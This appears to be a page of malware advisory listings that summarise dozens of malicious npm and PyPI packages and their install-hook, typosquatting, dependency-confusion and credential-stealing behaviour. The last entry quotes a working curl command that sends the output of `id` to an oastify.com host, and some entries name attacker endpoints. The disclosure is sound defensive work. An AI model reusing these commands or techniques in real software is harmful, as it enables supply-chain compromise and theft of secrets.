226511 matches found
Malicious code in @immobiliarelabs/backstage-plugin-gitlab (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 00eb86df154a9532085ad285ee63cd4c4f9a95a6fe983b9930cd059dfb4cb3f5 The package ships a binding.gyp at the package root whose targets/sources fields contain GYP command-expansion syntax !... at line 6. npm implicitly...
Malicious code in @carvana.authentication-flows/shared (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 78538bf70d1ebd3e4cd784d90b3961ea7966ce9b97e8124110374cad95c0b894 package.json declares a preinstall hook node index.js that runs unconditionally on npm install. index.js imports childprocess/os/https, collects host...
Malicious code in express-plugin (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 183cda19ef38d3451b375669fb460577a83217091d96d7fc11d5bf33679c8003 On module load, index.js auto-invokes initPlugin, which HTTP-GETs https://jsonkeeper.com/b/PRA3O, parses the JSON response, and passes the response's...
Malicious code in ts-einkle (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fa992a8f9afcf95d3c0e35b6abc290ff565b450663f6d43511467cd370eefce8 [email protected] ships a comprehensive installer-side stealer in its main module peer-math.js. On require, syncSession runs a chain packProjectBundle,...
Malicious code in ts-einkle-slot (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f565a21645ed6a288a820dea60e648589a5cca95a91b2c90720f3d2bcadca73b Package is published as ts-einkle-slot but its tarball contents source, README, LICENCE, package.json author/repository/description are copied verbat...
Malicious code in @epsteinlovekids483/crossmint-wallets-sdk-pentest (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6e43e5a418541bb3e485010eba536ecc9f1483dba866af53ff4a760684409213 Package's main entry dist/index.cjs unconditionally requires dist/shai-hulud.js at module load. On require, the code harvests installer secrets —...
Malicious code in rollup-plugin-polyfill-connect (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware b21017bf70f3f7909beadfff916971711ef9d236ab81797b3bb53569034fa67c Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in react-icon-svgs (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware ff5b9a03e2018642801f0a9d253297cf1eb8ce39a8af4152f31bcd045e4768d2 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in ai-node-agent (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 0730db02e46f4cfb224880f60bcdcdd43ed4d1bc97c68ee404428f7c592445cb Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in ai-node-relay (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 15dbf12bf77945563589af277a5a11fc548f282dfb1ab8fb8b0e8253d28ec854 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in inlifegram (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3975a0998bf76dddc25f0138b1d4b408bb06304b3203dc1e62e0110b2b56425f InLifeGram distributes a modified copy of the pyrogram Telegram client library and installs it into the top-level pyrogram import namespace, so impor...
Malicious code in sqligen (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector de59ac5884f286d69e42a71ba0cb7b99aa06d2b1f0e28a279a84d3db86eb3196 setup.py contains an obfuscated install-time dropper that fires on Windows. Two functions with diagnostic-sounding names 'GetDefaultSystemPolicy' /...
Malicious code in dtxto1ols (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 926fc822a2a507fafa6d2e1bb02a9b2bada7d89d3042bd3f0cac0ba2fd7c1991 package.json declares a postinstall script that runs automatically on npm install. The script performs filesystem reconnaissance find / -type f...
Malicious code in dtxtools (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector de085e4b6d38025a5a0b959b19b1022deaa7525b427e66679b58b6892328297a package.json declares a postinstall lifecycle script that auto-executes on npm install. The hook performs a recursive filesystem search for database...
Malicious code in @merceas/cross-fetch (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 5f6307129b7d9edcbd76ffc93c9d8a6ae146332951d5ce90e659afe1eec01127 Package is published under the @merceas scope as cross-fetch and reuses the upstream cross-fetch README, homepage github.com/lquixada/cross-fetch, an...
Malicious code in @merceas/anchor (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 86a51319de26245ad91c68a6a6d0713454112443e55f466711e79eb1a23a45b8 Package is published as @merceas/anchor but its README, homepage https://github.com/coral-xyz/anchorreadme, repository, and source are a verbatim cop...
Malicious code in react-context-form-tdsss (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7a53e75a65681ee9ea818634ddee1ed52c6c8398dbd68e2b6abca255b24aaf37 [email protected] is a dependency-confusion payload. package.json declares scripts.preinstall="node index.js", and index.js issues an...
Malicious code in tw-style-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 0af16d76f3fa788874c372ddcf606db1ee997f80329274dca8049e9638221318 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in pump-stream-logger (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 75034d3c53f657ffc5e0f43c2624e56ae27b9f21c52c17e7d46546223839787c Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in pino-zod (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware d57b4e49a62a8ca174c6c14820e5b101d042e3aea94438df19f9b12286a7cf30 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in pump-laserstream-parser (npm)
--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 6fb903c9973dccd215784f31fb196f88a80e863d1de9e3555c1c1ba2b2af09d8 Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...
Malicious code in hydanlabs (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 92288b41a62d25886b2aafe73ced1054249d215d131bb4d7e5e2353e1f1a3b5f The CLI hardcodes its LLM backend to a bare-IP, plain-HTTP endpoint http://151.244.40.74:4000 controlled by the package author. Every request POSTs a...
Malicious code in openblox (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cdd874a78973f84b5373fc03a48472c338ca82ef0a258b7614f81a8359da1201 setup.py invokes GetGitCommitHash unconditionally at module top level, so it runs on pip install openblox and any setuptools invocation. On Windows t...
Malicious code in js-price-client-node (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 763a44df6481ee1948ff9fda0b3997a93001acb138b7bbcba1787c3f2f8699f2 On npm install, the package's postinstall script invokes prices in dist/index.js, which resolves the consumer's project root via process.env.INITCWD?...
Malicious code in js-client-node (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 341a29bc48b39d363662fe66dcf13ca9bc3db921cdae84e53b070fc7b3a935a2 package.json declares a postinstall hook node dist/postinstall.js that runs automatically on npm install. The hook invokes prices in dist/index.js,...
Malicious code in dttfdsdee (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ae565bed85ec0db27f1ff658c7e9491591ce40edc56f423cd8b1122bc209c69c package.json declares a postinstall script that runs automatically on npm install. The script walks the entire filesystem with find to locate databas...
Malicious code in chai-as-synced (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 7bc0ee3e6a8341e046b84880f9faf0a4750f4a261a791b95d1267066d7828071 Package name 'chai-as-synced' impersonates the well-known 'chai-as-promised'. On require, index.js spawns a detached, stdio-ignored Node child runnin...
Malicious code in set-cookie-ease (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector b2bf656ba38b4d951239ee29799f510de4a8cb93fcf5d8005db4cd679a8631e6 Package masquerades as js-cookie same banner /! js-cookie v3.0.5 | MIT /, README, and repository.url: git://github.com/js-cookie/js-cookie.git but...
Malicious code in mongoose-json-format (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2a3dc63cdceb40d6f0fe338bcdbe589689ab2897f44cbb6b7c3d0192b5bd09c5 On require, helpers.js instantiates a Helper whose constructor invokes createLog. createLog base64-decodes the string assigned to HASHKEY decoding to...
Malicious code in @dervix/ws (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 79b9ab7431b1a6a1250c089e2ea33f54ad92313f587fbd2aabc020c12be55f69 Package @dervix/ws impersonates the popular ws WebSocket library — package.json copies the legitimate ws project's homepage...
Malicious code in wellnpm (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2cce5614817c010bad6d6bd86146713b627ad235b87d9ccd341bd3d996a80119 [email protected] ships a 24MB ELF binary named launch which is the XMRig Monero miner RandomX, cn/upx2, ghostrider algorithm strings, libuv/OpenSSL...
Malicious code in animatecss-postcss-plugin (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6be12cec08d0999c157774b746c3e431825ae61635bb8ddddf36061d4602cec7 [email protected] ships a tiny PostCSS plugin factory whose body contains an obfuscator.io-style string-array + RC4 decoder functions...
Malicious code in @help-forms/application-aff (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ab5ab5493acb5b3ffcab7f80dbdf34e1485bbe5d5d03978949199cdabf6f676a @help-forms/[email protected] ships a heavily obfuscated postinstall script scripts/postinstall.js, obfuscator.io fingerprints: rotated string...
Malicious code in data-parser-utils (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2fb4c4230fa7663c13b273922ecdf6dad55a30791d1332067841ec011814e5b8 index.js imports childprocess at the top of the module and invokes execSync against bash and zsh at lines 301 and 317. The shape —...
Malicious code in prism-silq (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6bb3e8b0ded57991e21f137aac7c905348a83f6be7914c4da619c18d2acd280c The package ships a binding.gyp whose sources field uses GYP command-expansion syntax !... at line 6. npm implicitly runs node-gyp rebuild whenever a...
Malicious code in hexo-shoka-swiper (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 62f045b55721408d94a92f5d65b58d69c98d3dc29d5f4f9327fb8edb4f85eaad The package ships a binding.gyp whose sources field uses GYP command-expansion syntax !... at line 6. npm implicitly runs node-gyp rebuild whenever a...
Malicious code in hexo-deployer-wrangler (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ebc95a6a1ae1e522feabf03446f9791372191e27ca9da454717559b6cc6948eb The package ships a binding.gyp file line 6 containing GYP command-expansion syntax !... inside the targets/sources fields. npm implicitly runs...
Malicious code in random-string-64 (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9fea72321e7eb57feb094bc31de2393ec2a56903156e1257a062e40541785b96 The package advertises itself as a 5-line random-string generator, but index.js the declared main contains a hardcoded AES-256-CBC ciphertext blob th...
Malicious code in extra-huggingface (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c76a4e01b00801049375b9e60419bfba79f9b0afbb02aab5b4117f989296c5d3 The package presents itself as part of the Hugging Face ecosystem but actually ships a remote-access agent. extrahuggingface/init.py re-exports...
Malicious code in pyext6cc8cd (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f98319eaa02d50e8a098d9cfaaca054df5acc8238dd08b2e24899f700e029a07 On pip install, setup.py decodes a hex string via bytes.fromhex"6f70656e202d612043616c63756c61746f72".decode.split to the argv open -a Calculator and...
Malicious code in kelly-stake (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 350ccf4a19896a23680e7478be01909de7f16057f175dc14de1d4e0bb92ad540 On npm install, scripts/install-check.cjs runs as a postinstall hook and performs a two-stage remote-code-execution flow: it fetches a JSON config fr...
Malicious code in gx-npm-lib (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector e919710d2f28ec776b8165821ebe2fbe480c1e432ec9416c7b73bd1315ee6a6e Package published at version 99.99.99 under a generic name gx-npm-lib — the canonical dependency-confusion shape used to overshadow internal packages...
Malicious code in gx-npm-ui (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 04e5ac6b8b24f2c158c37d3d6ac268bbf7f472433660064491538ee468cfcfcb Package published at version 99.99.99 under the gx-npm- namespace, a shape designed to win npm version resolution against private internal packages o...
Malicious code in velocityfix (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector c937a54c3629f80fb7b92fbdafda502706b6028b43bc4675eb30c55d9bc059e9 Package masquerades as 'Performance fixes for Minecraft Velocity proxy' authored by 'Velocity Team' — Velocity is a Java project from PaperMC and has...
Malicious code in log-update-ts (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8dbad34a92b1a5080681d7966e3c807324847605ee60f874076b85e336860def Package masquerades as Sindre Sorhus's popular 'log-update' library matching name and description claiming 'Log by overwriting the previous output in...
Malicious code in @salem_jalal/osc-components (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector cb26651411f61b6420c6291f7b3a7a4869bb670f1d4c75ddfc37481c50f3aae7 The package's postinstall hook install.js, wired via package.json scripts.postinstall runs on every npm install and transmits installer host...
Malicious code in unsafe-malicious-package (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 3579cb796e48f446b07e2dbbce2e301d1a3e87d8a9a35ed1dbe825fc53f29da9 On npm install, the package's postinstall lifecycle script scripts/postinstall.js reads the installer's AWS credentials file at /.aws/credentials and...
Malicious code in starship-timeline (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 8a4e552337fa70064e0a04644ee5a64378809a85b281eda24707bc9a6eba473f [email protected] ships no real functionality. Its package.json declares a preinstall hook "preinstall": "node index.js" that runs automaticall...
Malicious code in runtimekit (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector ffa393dec171ebd22b63776d7550006d3f9f60ad8726ce1153784080e9038acd lib/index.cjs and lib/index.mjs re-required from lib/readonly.cjs contain a self-executing IIFE that decodes two opaque strings via a custom shuffle...
Malicious code in mi-test-99-tuapellido (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 4b71b66c156e0a54b73b6dd2f2f9e994ac9c1ff9ab4d1f9689f1f930b3097f39 On every import, the package's top-level init.py runs os.system"curl http://6krddfbeqw0pisps3egdsofu9lfc33vrk.oastify.com -d $id". This unconditional...